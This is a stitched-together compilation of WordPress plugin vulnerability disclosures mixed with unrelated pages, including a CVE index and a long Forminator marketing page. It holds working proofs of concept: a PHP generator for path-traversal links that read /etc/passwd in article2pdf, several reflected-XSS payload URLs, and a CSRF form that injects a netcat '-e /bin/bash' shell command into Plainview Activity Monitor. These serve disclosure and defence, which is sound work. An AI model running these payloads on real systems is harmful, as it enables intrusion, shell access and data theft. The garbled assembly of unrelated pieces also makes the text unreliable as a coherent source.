A disk space or quota exhaustion issue exists in article2pdf_getfile.php in the article2pdf Wordpress plugin 0.24, 0.25, 0.26, 0.27. Visiting PDF generation link but not following the redirect will leave behind a PDF file on disk which will never be deleted by the plug-in.

**Bugtraq mailing list archives**

_From_: Christian Lerrahn <cybersec () drwaryaa com>  
_Date_: Tue, 26 Mar 2019 12:31:25 +1100  

Product: article2pdf (Wordpress plug-in)
Product Website: https://wordpress.org/plugins/article2pdf/
Affected Versions: 0.24 and greater

The following vulnerabilities were found in a code review of the plug-in. An attempt to contact the plug-in maintainer on 8 December 2018 was unsuccessful. The Wordpress security team disabled downloads

of the plug-in upon notification on 8 January 2019.

I would like to thank Ken Johnson (@cktricky) and Set Law (@sethlaw) whose course "Seth & Ken's Excellent Adventures in Secure Code Review" sparked my interest in reviewing code for

vulnerabilities.

\[CVE-2019-1000031\] Generated PDF file is only removed after download which is initiated by a redirect

\=====================================================================================================
Type:
-----
Resource Exhaustion

Description:
-----------
The plugin generates a PDF version of a post/article when a link of the
form

https://www.example.com/.../my-post-title/?article2pdf=1

is visited. The response to this initial request is a redirect to a link
like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=xxx&r=yyy&d=zzz

which will then return the PDF file contents and subsequently delete
the file.

As the deletion is coupled with the download but the download is
initiated by a different request than the one which creates the file,
visiting the link which creates the file and not following the redirect
results in the file not being deleted. These files can then accumulate
and potentially exhaust the available disk space.

Depending on the server setup, space exhaustion of a hard drive or hard
drive partition or even just a disk quota can result in denial of
service even for unrelated services on the same machine which rely on
the same resource.

This issue was originally reported on the plugin's bug tracker \[2\] but
never identified as a vulnerability.

Exploit
-------
Repeatedly visit a PDF generation link the plugin provides without ever
following the redirect to exhaust disk space.

\[CVE-2019-1010257\] PDF file download path is constructed from insufficiently sanitised user input

\=================================================================================================
Type:
-----
Information Disclosure / File Deletion

Description:
------------
When visiting the PDF download link which the original PDF generation
link redirects to, the file path is constructed from a combination of
fixed strings and the strings provided via the query string of the
download URL. The download URL has the form

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=xxx&r=yyy&d=zzz

where xxx is a base64 encoded absolute string, xxx is a short hex hash
and zzz is the base64 encoded URL title slug of the post the PDF was
generated from. While the plugin attempts to sanitise these input
parameters to not allow path traversal, this sanitisation is
insufficient and can be fully or partially circumvented depending on
the PHP version the Wordpress instance is running on.

In the case of PHP version <5.3 it is possible to read any file the
user the plugin is executed under has read access to by just encoding
the full file path in the parameter "d" and terminating that string
with a null-byte. The parameter "p" must not be empty but can contain
any value. The parameter "r" may be empty but its value is of no
significance. If the user that the script is executed as has write
access to the file or the directory it is stored in, the file will be
deleted after it has been downloaded. If the user has no write access,
an error message may be shown at the end of the file contents
offered which discloses the Wordpress instance's install directory on
the server.

In the case of PHP version >=5.3, null-termination will no longer cut
off the string. As the generated file name ends with a fixed string
".pdf", only files with that file ending can be read. The parameter "d"
may be any directory on the server. The parameter "p" needs to contain
8 backspace characters to delete a prepended fixed string from the file
name while the parameter "r" must contain exactly one backspace. The
actual file name (without the ".pdf") can then be appended to the
backspaces in either parameter "p" or parameter "r". It is also
possible to have "p" contain one random character and then have 10
backspace characters followed by the actual file name (again,
without the ".pdf") stored in parameter "r".

The information above can also be found on the plug-in's issue tracker \[3\].

Exploit:
--------
On PHP <5.3, a specially crafted link like

http://php52.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=YQ==&r=&d=L2V0Yy9wYXNzd2QA

will download the server's /etc/passwd file.

On PHP >=5.3, a specially crafted link like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=CAgICAgICAg=&r=%08test&d=L3RtcA==

will return the contents of the file "/tmp/test.pdf" and delete the
file if the user the script is executed as has permissions to do so.

The link used above can be generated using a few lines of PHP:

    <?php
    $d52 = base64\_encode("/etc/passwd\\0");
    $p52 = base64\_encode("a");
    $r52 = "";

echo "http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=${p52}&r=${r52}&d=${d52}\\n";;

    $d53 = base64\_encode("/tmp");
    $p53\_raw = "";
    for ($i=0;$i<8; $i++) $p53\_raw .= chr(8);
    $p53 = base64\_encode($p53\_raw);
    $r53 = "%08test";

echo "http://www.example.com/wp-content/plugins/article2pdf/article2pdf\_getfile.php?p=${p53}&r=${r53}&d=${d53}\\n";;

\[1\] https://wordpress.org/plugins/article2pdf/

\[2\] https://wordpress.org/support/topic/plugin-article2pdf-temporary-files-filling-up-server-space/ \[3\] https://wordpress.org/support/topic/pdf-download-path-improperly-sanitised/

**Current thread:**

*   **\[article2pdf (Wordpress plug-in)\] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)** _Christian Lerrahn (Mar 26)_

CVE-2019-1000031: [article2pdf (Wordpress plug-in)] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)

The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.

*   Vulnerability: XSS
*   Affected Software: wpGoogleMaps (400,000+ active installations)
*   Affected Version: 7.10.41
*   Patched Version: 7.10.43
*   Risk: Medium
*   Vendor Contacted: 10/25/2018
*   Vendor Fix: 10/31/2018
*   Public Disclosure: 02/05/2019

**CVSS**

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**Details**

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it echoes PHP\_SELF without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

**Proof of Concept**

    http://192.168.0.103/wordpress/wp-admin/admin.php/'"><img src=x onerror=alert(1)>?page=wp-google-maps-menu&action=foo
    

**Code**

    wp-google-maps/wpGoogleMaps.php                          
    <input type='hidden' name='http_referer' value='".$_SERVER['PHP_SELF']."' />
    

**Timeline**

*   10/25/2018 Sent advisory
*   10/25/2018 Vendor confirms and releases fix
*   10/25/2018 Suggested improvement for fix
*   10/31/2018 Vendor releases improved fix
*   02/05/2019 Disclosure

CVE-2019-9912: wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)

The wp-live-chat-support plugin before 8.0.18 for WordPress has wp-admin/admin.php?page=wplivechat-menu-gdpr-page term XSS.

*   Vulnerability: XSS
*   Affected Software: WP Live Chat Support (60,000+ active installations)
*   Affected Version: 8.0.17
*   Patched Version: 8.0.18
*   Risk: Medium
*   Vendor Contacted: 10/31/2018
*   Vendor Fix: 11/01/2018
*   Public Disclosure: 02/05/2019

**CVSS**

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**Details**

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS as it echoes the term parameter without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

**Proof of Concept**

    http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='"><img+src%3Dx+onerror%3Dalert(1)>
    

**Code**

    wp-live-chat-support/modules/gdpr.php:                      <a class='button' href='?page=wplivechat-menu-gdpr-page&term=<?php echo($_GET["term"]); ?>&action=delete&filter=<?php echo $action_action_filter; ?>&id=<?php echo $cid; ?>'><?php echo $delete_button_text; ?></a>
    wp-live-chat-support/modules/gdpr.php:                      <a class='button button-primary' href='?page=wplivechat-menu-gdpr-page&term=<?php echo($_GET["term"]); ?>&action=download&filter=<?php echo $action_action_filter; ?>&id=<?php echo $cid; ?>'><?php echo $download_button_text; ?></a>
    

**Further**

In addition to the reflected XSS issue, there is a self-XSS issue in the client-side input form, which can be triggered by entering '"><img src=x onerror=alert(1)>. Self-XSS may be exploitable via social engineering or Clickjacking.

**Timeline**

*   10/31/2018 Requested email address via contact form
*   10/31/2018 Vendor responds, advisory sent
*   11/01/2018 Vendor releases fix
*   02/05/2019 Confirmed fix & Disclosure

CVE-2019-9913: WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)

The "Donation Plugin and Fundraising Platform" plugin before 2.3.1 for WordPress has wp-admin/edit.php csv XSS.

*   Vulnerability: XSS
*   Affected Software: Give (50,000+ active installations)
*   Affected Version: 2.3.0
*   Patched Version: 2.3.1
*   Risk: Medium
*   Vendor Contacted: 11/24/2018
*   Vendor Fix: 12/13/2018
*   Public Disclosure: 02/05/2019

**CVSS**

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

**Details**

The Give WordPress plugin is vulnerable to reflected XSS as it echoes various parameter without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

**Proof of Concept**

    http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations&step=3&mapto%5B0%5D=email&mapto%5B1%5D=first_name&mapto%5B2%5D=amount&mapto%5B3%5D=form_id&csv='"><img+src%3dx+onerror%3dalert(1)>
    

**Code**

    public function start_import() {
        [...]
        <input type="hidden" value='<?php echo maybe_serialize( $_REQUEST['mapto'] ); ?>' name="mapto"
       class="mapto">
        <input type="hidden" value="<?php echo $_REQUEST['csv']; ?>" name="csv" class="csv">
        <input type="hidden" value="<?php echo $_REQUEST['mode']; ?>" name="mode" class="mode">
        <input type="hidden" value="<?php echo $_REQUEST['create_user']; ?>" name="create_user"
       class="create_user">
        <input type="hidden" value="<?php echo $_REQUEST['delete_csv']; ?>" name="delete_csv"
       class="delete_csv">
        <input type="hidden" value="<?php echo $delimiter; ?>" name="delimiter">
        <input type="hidden" value="<?php echo absint( $_REQUEST['dry_run'] ); ?>" name="dry_run">
    

**Timeline**

*   11/24/2018 Asked for email address via contact form
*   11/24/2018 Vendor responds, advisory sent
*   12/13/2018 Vendor releases fix
*   02/05/2019 Confirmed fix & Disclosure

CVE-2019-9909: Give 2.3.0 - Reflected XSS (WordPress Plugin)

An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user input validation, this leads to authenticated code execution on the device.

This website will mainly for manageing advisories which i create on day to day basis and for My CVE Database.

CVE ID

VENDOR

ISSUE

Reference

CVE-2015-1437

ASUS

XSS In Asus Router

https://nvd.nist.gov/vuln/detail/CVE-2015-1437

CVE-2015-1614

WordPress

XSRF(CSRF+XSS)

https://nvd.nist.gov/vuln/detail/CVE-2015-1614

CVE-2015-2755

WordPress

XSS / CSRF

https://nvd.nist.gov/vuln/detail/CVE-2015-2755

CVE-2016-9259

Tenable

Nessus XSS

https://www.tenable.com/security/tns-2016-17

CVE-2016-9261

Tenable

LCE XSS

https://www.tenable.com/security/tns-2016-18

CVE-2016-7103

Tenable

Security Centre XSS

https://www.tenable.com/security/tns-2016-19

CVE-2016-7103

Tenable

PVS XSS

https://www.tenable.com/security/tns-2016-20

CVE-2018-19524

Skyworth

Stack Overflow in Gpon Devices

https://s3curityb3ast.github.io/KSA-Dev-001.md

CVE-2018-19525

Systorme

Account takeover

https://s3curityb3ast.github.io/KSA-Dev-002.md

CVE-2019-7383

Systorme

RCE via shell upload

https://s3curityb3ast.github.io/KSA-Dev-003.md

CVE-2019-7387

Systorme

LFI

https://s3curityb3ast.github.io/KSA-Dev-004.md

CVE-2019-7384

Raisecom

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-005.md

CVE-2019-7385

Raisecom

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-006.md

CVE-2019-7386

NOKIA & HDM & KAI

Buffer overflow

https://s3curityb3ast.github.io/KSA-Dev-007.md

CVE-2020-21884

UniBox

XSRF

https://s3curityb3ast.github.io/KSA-Dev-008.txt

CVE-2020-21883

Unibox

Auth RCE

https://s3curityb3ast.github.io/KSA-Dev-009.txt

CVE-2021-3275

TP Link

Unauth-XSRF

https://s3curityb3ast.github.io/KSA-Dev-010.md

CVE-2021-25326

Skyworth

Info\_Disc

https://s3curityb3ast.github.io/KSA-Dev-012.txt

CVE-2021-25327

Skyworth

XSRF

https://s3curityb3ast.github.io/KSA-Dev-011.txt

CVE-2021-25328

Skyworth

Auth-RCE

https://s3curityb3ast.github.io/KSA-Dev-010.txt

CVE-2019-7385: Welcome to Kaustubh security advisories

Cross-site request forgery (CSRF) vulnerability in Smart Forms 2.6.15 and earlier allows remote attackers to hijack the authentication of administrators via a specially crafted page.

CVE-2019-5924: Smart Forms – when you need more than just a contact form

The "Forminator Contact Form, Poll & Quiz Builder" plugin before 1.6 for WordPress has XSS via a custom input field of a poll.

_Not your typical form-making plugin. Forminator is the easy-to-use WordPress form builder plugin for every website and situation. It’s the easiest way to create any form – contact form, order form, payment form, email form, feedback widgets, interactive polls with real-time results, buzzfeed-style “no wrong answer” quizzes, service estimators, and registration forms with payment options including PayPal and Stripe._

It’s the magical WordPress form builder for, well, everyone!

Forminator’s drag and drop visual builder makes it easy to setup and add forms to your WordPress website. Collect information, make your content interactive and generate more conversions with Forminator.

**Forminator Forms, Surveys, Quizzes, Polls, Calculations and More…**

*   Forms – Custom forms for all your needs with as many fields as you like.
*   Polls – Interactive polls to collect users opinions, with lots of dynamic options and settings.
*   Quizzes – Fun or challenging quizzes for your visitors to take and share on social media.
*   Calculations – Collect information, generate leads, take orders, and engage visitors.
*   Payments – Take payments, donations, down payments, sell merch with the included Stripe and PayPal integrations.

**Learn The Ropes With These Hands-On Forminator Tutorials**

*   Creating the Perfect Contact Form with Forminator
*   Create an Easy Payment Form (for free!) with Forminator
*   How to Get the Most Out of Using Forminator
*   How To Capture eSignatures Using Forminator
*   How To Collect Emails and Generate Leads With a Forminator Quiz

**Accept Payments With Stripe and PayPal**

Start taking payments with Forminator. No Pro upgrade required! SCA compliant Stripe and PayPal come included. Just enter your publish keys to activate the Forminator payment module for both fixed and variable payments. Check out how it works in the video below:

**Stripe Verified Partner**

Forminator is also proud to be a Stripe Verified Partner. This partnership allows us to help you get the most out of our Stripe integration thanks to additional resources, e.g. the ability to escalate support questions, or request custom pricing reviews.

**Calculations are a Lead Magnet**

There are literally thousands of combinations for adding value to your site with Calculations:

*   Registration forms with upgrade packages
*   Sell a tee shirt with size, color, price, and tax variations
*   Add a BMI and/or calorie intake calculator to your health and fitness blog
*   Embed a loan calculator into your finance site
*   Give a midwife a due date calculator
*   Insta-quote or service estimator
*   Put an ROI calculator on your agency site
*   And on, and on, and on…

**Drag and Drop Form Blocks**

Forminator has a bunch of drag and drop blocks that make it easy to put forms together – name, email, phone number, text, file upload, website, date, time, number, HTML, pagination, radio boxes, GDPR-friendly opt-ins, payments, calculations, and hidden field.

**Your Favorite Integrations Including +1000 Apps Already Added**

Forminator comes stacked with crowd favorite third-party integrations – email services, CRM, storage, and project managers.

*   HubSpot
*   Campaign Monitor
*   ActiveCampaign
*   Google Sheets
*   Webhooks (Zapier, Make, Tray, etc)
*   Trello
*   MailChimp
*   AWeber
*   Slack

**Develop And Sell Your Own Extensions**

Forminator is free and open to millions of WordPress users! Use the developer API and the included hooks and filters to build your own integrations or custom apps and sell them or give them away free here on WordPress.org.

**Poll Your Visitors**

Polls are a brilliant way to engage visitors. Forminator gives real-time feedback with live stats displayed in beautiful pie charts and graphs.

**Your Own Facebook-Style Quizzes**

Who hasn’t been roped into taking “IQ tests” and “figure out which Star Wars character you are” quizzes on Facebook? Now you can run all that traffic to your site. Create both knowledge and no wrong answer quizzes with Forminator.

**Collect Leads With Your Quizzes**

Looking to use your quizzes for more than just entertainment and a way to engage your audience? Forminator also allows you to collect participants’ details (e.g., name, email, etc.) by integrating a lead generation form in your quiz. See how it works below:

**Gutenberg Block**

Forminator’s got you, whether you’re a classic editor or Gutenberg early adapter. Say goodbye to shortcodes and quickly add forms to posts with the Forminator block for Gutenberg.

**Email Routing and Pre-Populate**

Make your site more efficient from visitor input to email response times. Use query strings to pre-fill your visitor information and deliver forms direct to specific teams with email routing, auto-response and conditions.

**User Front End Post Submissions**

Want to let your visitors share a post submission without needing access to the WordPress dashboard? With Forminator visitors can submit post ideas from the front end of your site so you can easily curate and publish their thoughts. Assign post to a default author, save to draft, publish immediately, etc.

**Google reCAPTCHA**

You don’t want your inbox flooded with a bunch of form spam. Google ReCAPTCHA is free with Forminator. Now you can stop the crazy bots without making it hard on your visitors. No more hard to read random phrases.

**Collect, Track and GDPR Ready**

Forminator stores and organizes submissions so you can sort, analyze and manage responses – of course, all while making it super easy to comply with the GDPR and other legal privacy policies.

**Import Your Existing Contact Form 7 Data**

Looking to move existing forms over from CF7? Forminator’s Import Wizard allows you to migrate all, or selected forms in a matter of clicks. You can also transfer data from a range of Contact Form 7 add-ons and settings.

**Custom Login and Registration Forms**

Create and embed custom login and registration forms for your sites (or multisites!). Take L&R forms to the next level: choose from a range of form fields, and customize settings, style, and behavior. Learn more in the video below:

**Multi-file Upload Field**

Along with enabling single file uploads, Forminator takes things up a notch by allowing users to upload multiple files. You can also choose to set specific file types, limit the number of files that can be uploaded, as well as the individual file size. The upload field’s drag and drop interface also makes it a breeze for users to upload files.

**Group And Repeat Form Fields**

The Field Group feature allows you to group any number of fields together in one form. You can also enable users to add as many additional field groups as needed when filling out your form. Great for repeatable data entry such as employment history, event attendees, lists, etc.

**Advanced Date Field Restrictions**

Perfect for appointment and hotel bookings – Forminator’s Date Picker Limits feature allows you to restrict the available dates shown on your date field calendar. For example, you might show future dates only, a selected number of dates from today, dates between a specific date range, specific days of the week, and more!

**Add An E-Signature Form Field (Pro Only)\***

Have an online application that requires a signature, or a contract you need your customers to sign? Forminator’s E-signature feature allows visitors to use their mouse, trackpad, or finger (on touch devices) to leave a signature upon submitting the form. Just insert the “E-Signature” field and voila!

**Receive Subscriptions and Recurring Payments on Stripe (Pro Only)\***

Create fully-customized subscription forms with Forminator Pro’s Stripe Subscription add-on. Allow your customers to choose plans/pricing, billing cycle, custom upsells, a free trial option, and of course, make secure card payments. Forminator also saves you time by instantly and automatically syncing all subscription form data straight to your Stripe account.

\***Note:** These features are only available with Forminator Pro. Get instant access to Forminator Pro – as well as all our other premium plugins, managed WP hosting, our site management platform: The Hub, and 24/7 expert support – all with a WPMU DEV membership.

**What Do People Say About Forminator?**

★★★★★

> Amazing plugin, it really seems that only your imagination can limit its uses. Loads of features like taking payments, calendar, for free. Can’t believe everything I need is in there, it sparks creativity and makes it fun to work on a website. – araca

★★★★★

> This plugin has an excellent, well-thought-out, well-designed UI and offers everything I was looking for (and I think I’ve tried every serious competitor). – tvsmvp

★★★★★

> This plugin is the best free form builder by far! I have researched many but this is so easy to use… Try it. I am SURE you will LOVE IT. – johncarteroz

★★★★★

> Great interface design, super easy to use and great functionality. I don’t normally write reviews, but I loved it so much, I just had to this time! – istavridi

**Shameless Plug(ins)**

Love Forminator! WPMU DEV has some other awesome free plugins you should checkout.

*   Smush – Image Compression and Optimization
*   Hummingbird – Page Speed Optimization
*   Hustle – Pop-ups, Slide-ins and Email Opt-ins
*   SmartCrawl – SEO Optimizer
*   Defender – Security, Monitoring, and Hack Protection

**About Us**

WPMU DEV is a premium supplier of quality WordPress plugins, services and support. Join here:  
https://wpmudev.com/

Don’t forget to stay up to date on everything WordPress from the Internet’s number one resource:  
WPMU DEV Blog

Hey, one more thing… we hope you enjoy our free offerings as much as we’ve loved making them for you!

**Contact and Credits**

WPMU DEV

CVE-2019-9567: Forminator – Contact Form, Payment Form & Custom Form Builder

The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

<html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
          <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
          <input type="hidden" name="lookup" value="Lookup" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2018-15877: Offensive Security’s Exploit Database Archive

The WP Live Chat Support plugin before 8.0.06 for WordPress has stored XSS via the Name field.

CVE-2018-9864

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

Tag

#wordpress